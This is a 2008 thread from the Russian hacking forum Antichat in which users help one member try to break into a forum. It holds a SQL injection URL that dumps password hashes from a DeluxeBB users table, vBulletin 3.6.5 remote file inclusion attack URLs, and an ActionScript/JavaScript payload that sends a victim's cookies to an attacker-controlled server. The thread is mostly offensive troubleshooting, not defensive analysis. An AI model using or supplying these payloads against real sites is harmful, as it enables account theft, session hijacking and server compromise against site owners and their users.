HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.05.2008, 15:51
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

Вывод не отключен, а как вычислить количество полей во втором запросе ?
 
Ответить с цитированием

  #2  
Старый 30.05.2008, 15:56
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

Ну а дальше как с простой скулей, подбирай поля при помощи order by
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #3  
Старый 30.05.2008, 17:30
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

дык могет форум та не бажный
 
Ответить с цитированием

  #4  
Старый 30.05.2008, 17:33
SeeJay
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами: 10639863

Репутация: 1
По умолчанию

Цитата:
Сообщение от Gorev  
дык могет форум та не бажный
А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!
 
Ответить с цитированием

  #5  
Старый 30.05.2008, 17:37
SeeJay
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами: 10639863

Репутация: 1
По умолчанию

Так тоже пытался…
Только вот что-то не очень получается…
Или это у меня руки кривые…!?



vBulletin v3.6.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:
[site]/vb/includes/functions.php?classfile=[Shell-Attack]
[site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
[site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
 
Ответить с цитированием

  #6  
Старый 30.05.2008, 17:42
[:|||||:]
Banned
Регистрация: 29.05.2008
Сообщений: 116
С нами: 9448043

Репутация: 208
По умолчанию

Цитата:
Сообщение от SeeJay  
А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!
А саму скулю подставлял:
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0  ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
 
Ответить с цитированием

  #7  
Старый 30.05.2008, 17:45
SeeJay
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами: 10639863

Репутация: 1
По умолчанию

Цитата:
Сообщение от [:|||||:]  
А саму скулю подставлял:
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0  ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
Подставлял!
Похоже и правда профиксено!
Ничего нету не ошибки, не информации!
Ребятки подскажите, что еще можно туда вставить!
 
Ответить с цитированием

  #8  
Старый 30.05.2008, 18:13
SeeJay
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами: 10639863

Репутация: 1
По умолчанию

И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??

Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java  script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
 
Ответить с цитированием

  #9  
Старый 30.05.2008, 17:32
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

У меня никогда этот сплойт не работал.
__________________
 
Ответить с цитированием

  #10  
Старый 30.05.2008, 18:15
[:|||||:]
Banned
Регистрация: 29.05.2008
Сообщений: 116
С нами: 9448043

Репутация: 208
По умолчанию

да, это ActionScript- язык сценариев, иcпользуемый в Flash
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...